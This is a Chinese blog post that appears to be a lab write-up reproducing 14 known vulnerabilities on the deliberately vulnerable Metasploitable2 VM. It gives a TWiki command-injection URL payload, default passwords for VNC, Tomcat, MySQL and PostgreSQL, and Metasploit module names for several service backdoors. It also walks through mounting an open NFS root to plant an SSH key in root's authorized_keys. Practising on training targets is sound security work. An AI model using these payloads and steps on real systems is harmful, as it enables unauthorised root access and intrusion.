【漏洞验证】Metasploitable2靶机漏洞复现

最新推荐文章于 2024-07-11 15:06:57 发布
最新推荐文章于 2024-07-11 15:06:57 发布
阅读量2.5k 收藏 20
点赞数 2
分类专栏: 测试 文章标签: Metasloitable2 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43486390/article/details/103465801
版权

文章目录

Metasploitable2靶机漏洞复现

参考大佬:
https://blog.csdn.net/Fly_hps/article/details/89763310
https://blog.csdn.net/fly_hps/article/details/89763364

环境:vmware虚拟机Metasploitable2环境
IP:192.168.72.130

1、TWiki ‘rev’ Parameter Arbitrary Command Execution

描述: rev参数可执行任意命令
验证: http://192.168.72.130/twiki/bin/view/Main/TWikiUsers?rev=2%20|pwd||echo
在这里插入图片描述

2、VNC Server ‘password’ Password

验证: vncviewer 192.168.72.130
Password: password在这里插入图片描述

3、Ingreslock 后门漏洞

原理: Ingreslock后门程序监听1524端口,连接到1524端口就可以直接获取root权限。
端口: 1524
验证: telnet 192.168.72.130 1524
在这里插入图片描述

4、UnrealIRCd Backdoor(ircd)

端口: 6667
利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor
在这里插入图片描述

5、 PHP-CGI Query String Parameter Injection Arbitrary Code Execution

CVE-2012-1823
利用模块: exploit/multi/http/php_cgi_arg_injection
在这里插入图片描述

6、Tomcat管理台默认口令漏洞

192.168.160.131:8180
tomcat/tomcat

7、MySQL弱密码登录

验证: mysql –h 192.168.160.131 –u root
在这里插入图片描述

8、PostgreSQL弱密码登录

postgres/postgres
在这里插入图片描述

9、Distcc后门漏洞

CVE-2004-2687

nmap扫描:
在这里插入图片描述
端口: 3632
利用模块: exploit/unix/misc/distcc_exec
在这里插入图片描述

10、vsftpd 2.3.4 后门漏洞

nmap扫描:
在这里插入图片描述
利用模块: exploit/unix/ftp/vsftpd_234_backdoor
在这里插入图片描述

11、Druby 远程代码执行漏洞

CVE-2013-0156(类似)

利用模块: exploit/linux/misc/drb_remote_codeexec
端口: 8787
在这里插入图片描述

12、Samba sysmlink 默认配置目录遍历漏洞

CVE-2010-0926

端口: 445
利用模块:
auxiliary/admin/smb/samba_symlink_traversal
set SMBSHARE tmp //设置SAM可写文件

在新窗口下打开上面生成的共享目录:

smbclient //IP/tmp (不输入密码直接回车)
cd rootfs
ls

在这里插入图片描述

13、Samba MS-RPC Shell 命令注入漏洞

CVE-2007-2447

端口: 139
利用模块: exploit/multi/samba/usermap_script
在这里插入图片描述

14、Linux NFS共享目录配置漏洞

原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录
在这里插入图片描述
在这里插入图片描述
输入ssh-keygen 生成RSA公钥
在这里插入图片描述
依次输入:
(1)mount –t nfs 192.168.160.131:/ /tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;
(2)cat/root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;
(3)sshroot@192.168.72.130,实现无密码登录
在这里插入图片描述

ps_x
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
配置VNC
苦行僧的妖孽日常
03-14 1万+
在CentOS 8.3配置vnc服务。vnc服务自v1.10.1版本以后,不能再使用vncserver命令直接开启vnc服务,需要使用systemd进行服务管理。记录该过程。
linux 漏洞靶机,【漏洞验证Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1038
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
VNC ServerpasswordPassword
最新发布
qq_47383081的博客
07-11 141
发现,连接被拒绝(是由于192.168.1.134的服务器出错)笔记方便个人回顾,如有错误欢迎指正。
Metasploitable2靶机之第五篇--Samba sysmlink 默认配置目录遍历漏洞(CVE-2010-0926)
千寻的博客
04-02 1432
文章目录环境原理漏洞复现第一步 发现漏洞第二步 ,启动metasploit第三步选择漏洞库第四步 设置参数,开始攻击第五步 利用成功,打开共享目录注意 smbclient 报错:摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 原理 漏洞复现 第一步 发现漏洞 第二步 ,启动metasploit msfconsole 第三步选择漏洞库 search samba use auxiliary
如何修改访问vnc服务器的密码,修改VNC访问的密码
weixin_42545292的博客
08-04 9932
:vncserver:iptables -I INPUT -p tcp --dport -j ACCEPT 客户端方式:iptables -I INPUT -p tcp --dport -j ACCEPT 浏览器方式:vi /root/.vnc/xstartup 注释掉最后一行 #twm & 末行添加:gnome-session &:vncserver :配置多个...
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
Metasploitable3靶机
05-09
Metasploitable3是一个win2008的靶机---...Metasploitable正对Metasploitable2改变了很多,里面很多漏洞都是需要自己挖掘的,可以更适应现在社会上的模拟让网安更容易学习 让网安人员更好的磨练自己的技能
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只...
9、VNC登录认证漏洞扫描
无痕的博客
12-13 1194
metasploitVNC登录认证漏洞扫描
metasploitable2靶场渗透
weixin_45349299的博客
02-13 398
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
靶机练习:DC-1靶机复现
m0_63755076的博客
09-02 1727
发现了三个端口,80、22和111三个端口。80和22端口可以进行攻击,111端口一般是rpcbind漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。发现密码是进过加密的,重置密码,可利/scripts/password-hash.sh脚本进行生成新密码。发现flag,该服务器开放了22端口,可以用hydra工具进行爆破。mysql正在运行,用刚才发现的密码进入数据库。
6-18漏洞利用-后门连接
山兔的博客
07-25 821
我们一定要检测,当前系统,开放了那些端口,在某些情况下,尽量没有使用的端口,尽量关闭,我们只开启,我们服务器运行状态下,必须要开启的端口号,不相关的端口号,直接关闭,当然,我们也要实时监测系统服务器的网络状态,在出现连接过程中,我们一定要注意很有可能,这就是一次连接后门程序的一个活动,我们要对它进行实时监控。我们根据bindshell,猜测到,会是一个后门程序,这个时候,我们就需要验证这个猜测,我们用nc连接目标地址的端口号,来对其后门进行连接,从而获取对应的权限。我们服务器为什么存在后门程序。...
Samba服务安全漏洞复现及利用[CVE-2007-2447]
sGanYu
09-22 3885
模拟环境: 攻击工具:kali Linux/nmap/msfconsole 目标:metasploittable2/UNIX 一、使用nmap扫描网段内主机 命令:【nmap -sS -Pn 192.168.200.134】 注:-sS会使nmap执行一次隐秘的TCP扫描,以确定某个特定的TCP端口是否开放,-Pn会告知nmap不执行ping命令预先判断目标是否存活,而是默认主机为存活,也可以尝试使用-A选项 MSF内同样也支持nmap扫描,但是这里-sV会进行探测快放端口以及版本信息扫描 .
linux漏洞Bind Shell Backdoor Detection
arissa666的博客
07-06 212
Bind Shell Backdoor Detection利用。telnet 主机地址 1524。
vncserverpassword改动
weixin_33753845的博客
06-16 491
前几天去客户现场,客户说有測试库。Linux下的,帮忙给新建一个数据库,我这么热心的人。是吧 那就開始吧。 一般使用vnc搞图形安装。熟练的打开vnc。输入password,报错!!我愣了几秒,忽然反应过来,这不是我的电脑,vncpassword我是根本不知道的!去找客户问问。客户表示n年前的东西。password不可考。那么,主题来了: cd /root/.vnc/ rm ...
VNC Server远程桌面配置详解
热门推荐
xiaochun730的博客
12-18 1万+
图形化界面展示,利于不习惯命令行人员操作,注意:实例均为root用户操作。 参考:https://blog.51cto.com/357355/615789 https://www.cnblogs.com/pipci/p/12731317.html 一、准备 客户端:Windows 10 专业版,下载链接:https://www.realvnc.com/en/connect/download/viewer/windows/ 服务端:10.199.88.244 CentOS r...
Metasploitable2 靶机漏洞
05-21
Metasploitable2是一款特意设计用于安全培训和漏洞评估的虚拟机,它包含了多个漏洞,可用于测试和学习渗透测试技术。以下是Metasploitable2中包含的一些常见漏洞: 1. Samba漏洞:该漏洞存在于Samba的可共享文件夹中,攻击者可以利用该漏洞执行任意代码并获取系统访问权限。 2. Apache漏洞Metasploitable2中的Apache服务器存在多个漏洞,可用于执行远程代码,包括一个可以导致缓冲区溢出的漏洞。 3. MySQL漏洞Metasploitable2中的MySQL服务器存在可被利用的漏洞,可以导致数据库注入攻击,从而使攻击者能够访问敏感数据。 4. FTP漏洞Metasploitable2中的FTP服务器存在许多漏洞,其中包括一个可以导致拒绝服务攻击的漏洞和一个可以导致远程代码执行的漏洞。 5. SSH漏洞Metasploitable2中的SSH服务器存在一个漏洞,可以导致拒绝服务攻击和远程代码执行。 需要注意的是,Metasploitable2是一个专门设计用于学习和测试渗透测试技术的虚拟机,不应该用于非法用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值